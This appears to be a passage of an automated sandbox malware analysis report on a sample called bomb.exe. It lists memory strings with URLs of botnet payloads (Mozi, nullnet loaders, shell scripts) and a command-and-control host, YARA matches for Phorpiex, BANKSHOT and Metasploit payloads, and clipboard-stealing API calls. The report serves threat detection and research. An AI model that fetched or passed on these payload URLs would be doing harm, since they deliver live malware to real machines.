Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/sparc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/x86
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/arc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/arm4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/arm7
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/i586
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/i686
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.39/sparc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/76d32be0.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/aws
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.69.223/jaws
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.69/armv6l
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.137.137.54:56058/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.158.161.51:54059/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.arc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.arm
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.arm7
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.i486
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.i686
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.mips
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.mpsl
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.sh4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.spc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.x86
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.x86_64
Source: bomb.exe, 00000000.00000002.2651263420.0000013431234000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317EB000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134313C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jask.powerforxes.shop/lopsa/66dc99a997229_VirtualLibrary.exe
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://laposte-fr.network/ISIS.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mexicoupsusa.sbs/ISIS.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://welcomsplus.ru/wp-admin/use/BNHCBhGsirW70.bin

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

4_2_00404970

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

4_2_00404970

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,

4_2_004059B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

8_2_00411F55

Source: bomb.exe, 00000000.00000002.2651263420.0000013431726000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_3f6f5912-1

Spam, unwanted Advertisements and Ransom Demands

Yara detected Phorpiex

Source: Yara match	File source: 26.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1958409377.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2071621421.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1851991589.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4201400872.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1947158859.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1978134558.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1882503312.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1919322254.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2003396502.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1947093681.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2096751492.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1908225903.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911911144.000000000067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: http185.215.113.66newtpp.exe.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 323057790.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\323057790.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysvplervcs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvplervcs.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.MSBuild.exe.43dcd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 8.2.MSBuild.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 8.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 8.2.MSBuild.exe.43f8e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 00000031.00000002.3020983924.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000032.00000002.2952010686.000000C000648000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000031.00000002.3020983924.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, type: DROPPED	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen

.NET source code contains very large array initializations

Source: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.0.dr, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 192000

PE file contains section with special chars

Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: +)>dXW>1
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: mc*8RIf7
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: L3.OdY!4
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: i+B3fOPT
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: 4I?:%,\P
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: cJBEF:g3
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: .7t*mT^X
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: 7uwH9j'/
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: E5BeN"Ml
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: Ebpr4)Y?

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040FB45 NtQueryVirtualMemory,	4_2_0040FB45
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,	4_2_0040DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	8_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67D062C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	8_2_67D062C0

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	File created: C:\Windows\sysvplervcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	File created: C:\Windows\CautionKnife
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	File created: C:\Windows\PrefersTracks
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	File created: C:\Windows\ConsideringAttached
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	File created: C:\Windows\HoneyAmounts
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	File created: C:\Windows\DevelopedSimulation
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\bomb.exe	Code function: 0_2_00007FFD9B7F08F8	0_2_00007FFD9B7F08F8
Source: C:\Users\user\Desktop\bomb.exe	Code function: 0_2_00007FFD9B7F035D	0_2_00007FFD9B7F035D
Source: C:\Users\user\Desktop\bomb.exe	Code function: 0_2_00007FFD9B7F041D	0_2_00007FFD9B7F041D
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004084D0	4_2_004084D0
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004084F9	4_2_004084F9
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_00404090	4_2_00404090
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040AEB0	4_2_0040AEB0
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_00404970	4_2_00404970
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040F908	4_2_0040F908
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE20AD	5_2_00EE20AD
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F351C3	5_2_00F351C3
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE729C	5_2_00EE729C
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F29377	5_2_00F29377
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F214FD	5_2_00F214FD
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F24465	5_2_00F24465
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F35561	5_2_00F35561
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EF9522	5_2_00EF9522
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EF6775	5_2_00EF6775
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F23705	5_2_00F23705
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F35933	5_2_00F35933
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F34D2E	5_2_00F34D2E
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F35D1B	5_2_00F35D1B
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE1E1E	5_2_00EE1E1E
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0272E364	6_2_0272E364
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0723BC28	6_2_0723BC28
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07237A68	6_2_07237A68
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0723BC18	6_2_0723BC18
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07237A59	6_2_07237A59
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07512A30	6_2_07512A30
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07511138	6_2_07511138
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07510888	6_2_07510888
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07511127	6_2_07511127
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07512190	6_2_07512190
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_075121A0	6_2_075121A0
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07510878	6_2_07510878
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0772EB50	6_2_0772EB50
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0772CD00	6_2_0772CD00
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0772B032	6_2_0772B032
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0772EB4D	6_2_0772EB4D
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07720138	6_2_07720138
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07720128	6_2_07720128
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0772CCF0	6_2_0772CCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041C585	8_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041B825	8_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042DA53	8_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042D2E3	8_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042CE4E	8_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041961D	8_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042DE3B	8_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042D681	8_2_0042D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BAA7D0	8_2_67BAA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C00700	8_2_67C00700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C1E6E0	8_2_67C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BDE6E0	8_2_67BDE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BA46D0	8_2_67BA46D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BDC650	8_2_67BDC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B745B0	8_2_67B745B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C4A5E0	8_2_67C4A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C0E5F0	8_2_67C0E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C84540	8_2_67C84540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC8550	8_2_67CC8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C20570	8_2_67C20570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE2560	8_2_67BE2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BD8540	8_2_67BD8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C1A4D0	8_2_67C1A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CAA480	8_2_67CAA480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BC64D0	8_2_67BC64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE4420	8_2_67BE4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B98460	8_2_67B98460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C0A430	8_2_67C0A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BDE3B0	8_2_67BDE3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BB23A0	8_2_67BB23A0
